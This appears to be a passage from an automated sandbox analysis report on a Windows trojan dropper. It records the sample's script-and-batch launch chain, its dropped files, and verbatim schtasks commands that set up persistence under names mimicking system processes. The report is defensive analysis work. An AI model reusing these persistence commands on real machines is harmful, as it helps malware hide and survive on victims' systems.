            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeCode function: 0_2_00F5473A0_2_00F5473A
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeCode function: 0_2_00F5070E0_2_00F5070E
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeCode function: 0_2_00F3E8A00_2_00F3E8A0
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeCode function: 0_2_00F3F9680_2_00F3F968
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeCode function: 0_2_00F549690_2_00F54969
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeCode function: 0_2_00F46A7B0_2_00F46A7B
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeCode function: 0_2_00F43A3C0_2_00F43A3C
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeCode function: 0_2_00F5CB600_2_00F5CB60
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeCode function: 0_2_00F50B430_2_00F50B43
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeCode function: 0_2_00F45C770_2_00F45C77
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeCode function: 0_2_00F4FDFA0_2_00F4FDFA
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeCode function: 0_2_00F43D6D0_2_00F43D6D
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeCode function: 0_2_00F3ED140_2_00F3ED14
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeCode function: 0_2_00F3DE6C0_2_00F3DE6C
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeCode function: 0_2_00F3BE130_2_00F3BE13
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeCode function: 0_2_00F50F780_2_00F50F78
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeCode function: 0_2_00F35F3C0_2_00F35F3C
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeCode function: String function: 00F4ED00 appears 31 times
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeCode function: String function: 00F4E360 appears 52 times
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeCode function: String function: 00F4E28C appears 35 times
            Source: brokercrt.exe.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: AFKwztugVSPq.exe.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: hx1hwVZIjy.exe, 00000000.00000003.1988768555.000000000759D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs hx1hwVZIjy.exe
            Source: hx1hwVZIjy.exe, 00000000.00000003.1988092710.0000000006C8A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs hx1hwVZIjy.exe
            Source: hx1hwVZIjy.exe, 00000000.00000003.1989191246.0000000007598000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs hx1hwVZIjy.exe
            Source: hx1hwVZIjy.exeBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs hx1hwVZIjy.exe
            Source: hx1hwVZIjy.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, Uy48Bwq9FymnVapyP1i.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, Uy48Bwq9FymnVapyP1i.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, H04jjeMoCO4LqIxl6lq.csCryptographic APIs: 'TransformBlock'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, H04jjeMoCO4LqIxl6lq.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, Uy48Bwq9FymnVapyP1i.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, Uy48Bwq9FymnVapyP1i.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, H04jjeMoCO4LqIxl6lq.csCryptographic APIs: 'TransformBlock'
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, H04jjeMoCO4LqIxl6lq.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, hkPU9DF7lvaIiDDnQnm.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.3.hx1hwVZIjy.exe.75ea531.1.raw.unpack, hkPU9DF7lvaIiDDnQnm.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, hkPU9DF7lvaIiDDnQnm.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.3.hx1hwVZIjy.exe.6cd7531.0.raw.unpack, hkPU9DF7lvaIiDDnQnm.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.troj.evad.winEXE@45/31@0/0
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeCode function: 0_2_00F36EC9 GetLastError,FormatMessageW,0_2_00F36EC9
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeCode function: 0_2_00F49E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00F49E1C
            Source: C:\ReviewHost\brokercrt.exeFile created: C:\Program Files (x86)\google\Update\AFKwztugVSPq.exeJump to behavior
            Source: C:\ReviewHost\brokercrt.exeFile created: C:\Users\user\AFKwztugVSPq.exeJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4416:120:WilError_03
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeMutant created: NULL
            Source: C:\ReviewHost\brokercrt.exeMutant created: \Sessions\1\BaseNamedObjects\Local\78906e2ee900157c56aa67d0f651f8aed49b26af
            Source: C:\ReviewHost\brokercrt.exeFile created: C:\Users\user\AppData\Local\Temp\hE0vHax3wkJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ReviewHost\Qtt5UtOWbMYxPmztsNxVxiRIZauHb.bat" "
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeCommand line argument: sfxname0_2_00F4D5D4
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeCommand line argument: sfxstime0_2_00F4D5D4
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeCommand line argument: STARTDLG0_2_00F4D5D4
            Source: hx1hwVZIjy.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: hx1hwVZIjy.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ReviewHost\brokercrt.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeFile read: C:\Windows\win.iniJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: hx1hwVZIjy.exeVirustotal: Detection: 61%
            Source: hx1hwVZIjy.exeReversingLabs: Detection: 73%
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeFile read: C:\Users\user\Desktop\hx1hwVZIjy.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\hx1hwVZIjy.exe "C:\Users\user\Desktop\hx1hwVZIjy.exe"
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ReviewHost\LGlGhCGbVntC7HCLV0QyeYWp.vbe"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ReviewHost\Qtt5UtOWbMYxPmztsNxVxiRIZauHb.bat" "
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ReviewHost\brokercrt.exe "C:\ReviewHost\brokercrt.exe"
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 11 /tr "'C:\Users\user\AFKwztugVSPq.exe'" /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AFKwztugVSPq" /sc ONLOGON /tr "'C:\Users\user\AFKwztugVSPq.exe'" /rl HIGHEST /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 7 /tr "'C:\Users\user\AFKwztugVSPq.exe'" /rl HIGHEST /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\ReviewHost\conhost.exe'" /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\ReviewHost\conhost.exe'" /rl HIGHEST /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\ReviewHost\conhost.exe'" /rl HIGHEST /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\google\Update\AFKwztugVSPq.exe'" /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AFKwztugVSPq" /sc ONLOGON /tr "'C:\Program Files (x86)\google\Update\AFKwztugVSPq.exe'" /rl HIGHEST /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\google\Update\AFKwztugVSPq.exe'" /rl HIGHEST /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WinStore.AppW" /sc MINUTE /mo 8 /tr "'C:\Users\Default\WinStore.App.exe'" /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WinStore.App" /sc ONLOGON /tr "'C:\Users\Default\WinStore.App.exe'" /rl HIGHEST /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WinStore.AppW" /sc MINUTE /mo 5 /tr "'C:\Users\Default\WinStore.App.exe'" /rl HIGHEST /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 10 /tr "'C:\ReviewHost\AFKwztugVSPq.exe'" /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AFKwztugVSPq" /sc ONLOGON /tr "'C:\ReviewHost\AFKwztugVSPq.exe'" /rl HIGHEST /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 6 /tr "'C:\ReviewHost\AFKwztugVSPq.exe'" /rl HIGHEST /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 13 /tr "'C:\Windows\Containers\serviced\wininit.exe'" /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Windows\Containers\serviced\wininit.exe'" /rl HIGHEST /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 13 /tr "'C:\Windows\Containers\serviced\wininit.exe'" /rl HIGHEST /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 10 /tr "'C:\Users\Public\AFKwztugVSPq.exe'" /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AFKwztugVSPq" /sc ONLOGON /tr "'C:\Users\Public\AFKwztugVSPq.exe'" /rl HIGHEST /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 11 /tr "'C:\Users\Public\AFKwztugVSPq.exe'" /rl HIGHEST /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "smsss" /sc MINUTE /mo 9 /tr "'C:\Recovery\smss.exe'" /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Recovery\smss.exe'" /rl HIGHEST /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "smsss" /sc MINUTE /mo 6 /tr "'C:\Recovery\smss.exe'" /rl HIGHEST /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\Recent\AFKwztugVSPq.exe'" /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AFKwztugVSPq" /sc ONLOGON /tr "'C:\Users\Default User\Recent\AFKwztugVSPq.exe'" /rl HIGHEST /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\Recent\AFKwztugVSPq.exe'" /rl HIGHEST /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 11 /tr "'C:\Users\Public\Videos\AFKwztugVSPq.exe'" /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AFKwztugVSPq" /sc ONLOGON /tr "'C:\Users\Public\Videos\AFKwztugVSPq.exe'" /rl HIGHEST /f
            Source: unknownProcess created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exe "C:\Users\Default User\Recent\AFKwztugVSPq.exe"
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "AFKwztugVSPqA" /sc MINUTE /mo 7 /tr "'C:\Users\Public\Videos\AFKwztugVSPq.exe'" /rl HIGHEST /f
            Source: unknownProcess created: C:\Users\Public\Videos\AFKwztugVSPq.exe C:\Users\Public\Videos\AFKwztugVSPq.exe
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "cscriptc" /sc MINUTE /mo 8 /tr "'C:\Users\Default User\Start Menu\Programs\System Tools\cscript.exe'" /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "cscript" /sc ONLOGON /tr "'C:\Users\Default User\Start Menu\Programs\System Tools\cscript.exe'" /rl HIGHEST /f
            Source: C:\ReviewHost\brokercrt.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "cscriptc" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Start Menu\Programs\System Tools\cscript.exe'" /rl HIGHEST /f
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ReviewHost\LGlGhCGbVntC7HCLV0QyeYWp.vbe" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ReviewHost\Qtt5UtOWbMYxPmztsNxVxiRIZauHb.bat" "Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ReviewHost\brokercrt.exe "C:\ReviewHost\brokercrt.exe"Jump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: dxgidebug.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
